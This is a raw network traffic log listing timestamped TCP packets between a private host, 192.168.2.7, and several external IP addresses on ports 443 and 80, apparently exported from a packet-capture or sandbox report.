Nov 9, 2024 02:47:15.792880058 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.792896032 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.793263912 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.793492079 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.793499947 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.822078943 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.913049936 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913095951 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913120031 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.913129091 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913171053 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.913176060 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913189888 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913239002 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.913245916 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913817883 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913904905 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913943052 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913953066 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.913959980 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.913985014 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.914433956 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914472103 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914495945 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.914501905 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914566994 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914612055 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914613008 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.914623976 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.914649963 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.915322065 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915373087 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915380001 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.915385962 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915446043 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915483952 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.915493011 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915504932 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915533066 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.915590048 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.915627003 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.915632963 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.916275024 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.916321039 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.916327000 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:16.034430027 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:16.034522057 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:16.034924030 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:16.034935951 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:16.073975086 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.074048996 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.078805923 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.078814030 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.079145908 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.091238976 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.131334066 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.314129114 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.314187050 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.314204931 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.314271927 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.314299107 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.314316988 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.314367056 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.343154907 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.343178034 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.343233109 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.343245029 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.343277931 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.343297005 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.423732996 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:16.423805952 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:16.435528994 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.435549974 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.435622931 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.435647011 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.435659885 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.435686111 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.462903023 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.462929010 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.462985039 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.462996960 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.463043928 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.463066101 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.464035988 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.464051962 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.464135885 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.464143991 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.464198112 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.465538979 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.465554953 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.465656042 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.465665102 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.465737104 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.555577040 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.555599928 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.555699110 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.555759907 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.555814981 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.582313061 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.582351923 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.582442999 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.582453012 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.582510948 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.583208084 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.583230019 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.583265066 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.583271027 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.583285093 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.583321095 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.583936930 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.583952904 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.584007978 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.584022999 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.584062099 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.584654093 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.584671021 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.584738970 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.584745884 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.584791899 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.585483074 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.585513115 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.585551023 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.585558891 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.585597038 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.585611105 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.585910082 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.586452961 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.586467981 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.586519957 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.586527109 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.586570978 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.675036907 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.675118923 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.675168037 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.675221920 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.675288916 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.675302982 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.675323009 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.675328970 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.716331005 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.716358900 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.716476917 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.717957020 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.717978954 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.718044043 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.718192101 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.718203068 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.718993902 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.719011068 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.719069958 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.719203949 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.719214916 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.724989891 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.725016117 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.725122929 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.725867987 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.725878000 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.725934029 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.726016998 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.726031065 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.726105928 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.726119041 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:16.726181030 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:16.726191044 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.458239079 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.458867073 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.458895922 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.459366083 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.459372997 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.460427999 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.460678101 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.460695982 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.461007118 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.461011887 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.466687918 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.467032909 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.467056036 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.467380047 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.467385054 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.469404936 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.469641924 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.469657898 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.469964981 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.469969988 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.525928974 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.526282072 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.526307106 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.526683092 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.526688099 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.590509892 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.590532064 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.590606928 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.590620041 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.590972900 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.591027021 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.591072083 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.591078043 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.591087103 CET	49715	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.591092110 CET	443	49715	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.593740940 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.593765020 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.593825102 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.593981981 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.593993902 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.598031044 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.599005938 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.599075079 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.599209070 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.599224091 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.599234104 CET	49716	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.599239111 CET	443	49716	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.601082087 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.601114988 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.601170063 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.601300955 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.601315975 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.655530930 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.655563116 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.655615091 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.655632019 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.655720949 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.655915976 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.655929089 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.655940056 CET	49717	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.655946016 CET	443	49717	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.659677029 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.659707069 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.659775972 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.659888029 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.659899950 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.754916906 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.755000114 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.755103111 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.755155087 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.755168915 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.755177975 CET	49718	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.755184889 CET	443	49718	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.757404089 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.757436991 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.757606030 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.757797003 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.757812023 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.929553986 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.929574966 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.929658890 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.929677963 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.929716110 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.942801952 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.942830086 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.942847967 CET	49714	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.942853928 CET	443	49714	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.945286036 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.945319891 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.945396900 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.945652962 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:17.945667982 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:17.987785101 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:17.987817049 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:17.987896919 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:17.989567995 CET	49725	443	192.168.2.7	184.28.90.27
Nov 9, 2024 02:47:17.989579916 CET	443	49725	184.28.90.27	192.168.2.7
Nov 9, 2024 02:47:18.322729111 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.323405027 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.323426008 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.323879957 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.323884010 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.352647066 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.353215933 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.353225946 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.353799105 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.353804111 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.393189907 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.393501997 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.393510103 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.393845081 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.393851042 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.454921007 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.454979897 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.455025911 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.455173016 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.455184937 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.455219030 CET	49720	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.455224037 CET	443	49720	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.457746029 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.457778931 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.457848072 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.457957983 CET	49726	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.457968950 CET	443	49726	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.491386890 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.491444111 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.491487980 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.491739988 CET	49721	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.491751909 CET	443	49721	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.493392944 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.493731022 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.493737936 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.494374037 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.494379044 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.495086908 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.495115995 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.495182991 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.495328903 CET	49727	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.495341063 CET	443	49727	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.526588917 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.526633978 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.526673079 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.526799917 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.526808023 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.526817083 CET	49722	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.526819944 CET	443	49722	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.529057026 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.529071093 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.529130936 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.529258966 CET	49728	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.529272079 CET	443	49728	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.582031965 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:18.582078934 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:18.582143068 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:18.582328081 CET	49730	443	192.168.2.7	142.250.186.142
Nov 9, 2024 02:47:18.582343102 CET	443	49730	142.250.186.142	192.168.2.7
Nov 9, 2024 02:47:18.622437000 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.622946978 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.622994900 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.623284101 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.623306990 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.623322964 CET	49723	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.623330116 CET	443	49723	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.634166002 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.634216070 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.634290934 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.634424925 CET	49731	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.634439945 CET	443	49731	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.681081057 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.681904078 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.681917906 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.682342052 CET	49724	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:18.682347059 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.811140060 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.811630964 CET	443	49724	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:18.811676979 CET	49724	443	192.168.2.7	13.107.246.45
